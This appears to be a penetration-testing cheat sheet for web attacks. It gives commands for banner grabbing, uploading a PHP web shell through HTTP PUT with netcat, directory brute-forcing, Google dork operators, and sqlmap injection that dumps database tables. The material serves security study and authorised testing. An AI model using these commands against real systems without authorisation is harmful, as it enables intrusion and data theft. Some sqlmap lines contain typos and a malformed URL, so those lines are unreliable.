Web Attacks

nc -v <target> <port>
HEAD / HTTP/1.0

HTTPS services

openssl s_client -connect <target>:<port>
HEAD / HTTP/1.0

Fingerpriting with Httprint

httprint -P0 -h <target> -s <signature file>

HTTP Verbs

GET, POST, HEAD, PUT, DELETE, OPTIONS

Using PUT to upload shell

# Get the content length of the shell
wc -m shell.php
<payload content length output>

# Then using nc to upload with the PUT method
nc <target> <port>
PUT /payload.php HTTP/1.0
Content-type: text/html
Content-length: <length of payload>

Directory and File Enumeration

Enumeration of files and directories can lead to many hidden resources that could contain:

  • New and untested features

  • Backup files

  • Testing information

  • Developer's notes

# Dirb is a great tool to use for directory/file brute forcing
dirb http://<target>

# Gobuster is another directory/file scanner written in Go
gobuster -u <target> -w <path to wordlist> -o <file to output to>

Google Dorks

Command
Meaning

site:

You can use this command to include only results on a given hostname.

intitle:

This command filters according to the title of a page.

inurl:

Similar to intitle, but works on the URL of a resource.

filetype:

This filters by using the file extension of a resource. For example .pdf or .xls.

AND, OR, &,

You can use logical operators to combine your expressions. For example: site:example.com OR site:another.com

-

You can use this character to filter out a keyword or a command's result from the query.

SQL Injection with SQLMap

sqlmap -u <target> -p <paramater> [options]

# Example
sqlmap -u 'http://vicitim.site/search.php?id=2' -p id --technique=U

# Dump contents of a specific table in a database
sqlamp -u 'http://victim.site/search.php?=1' -D <database name> -T <table name> --dump

Last updated

Was this helpful?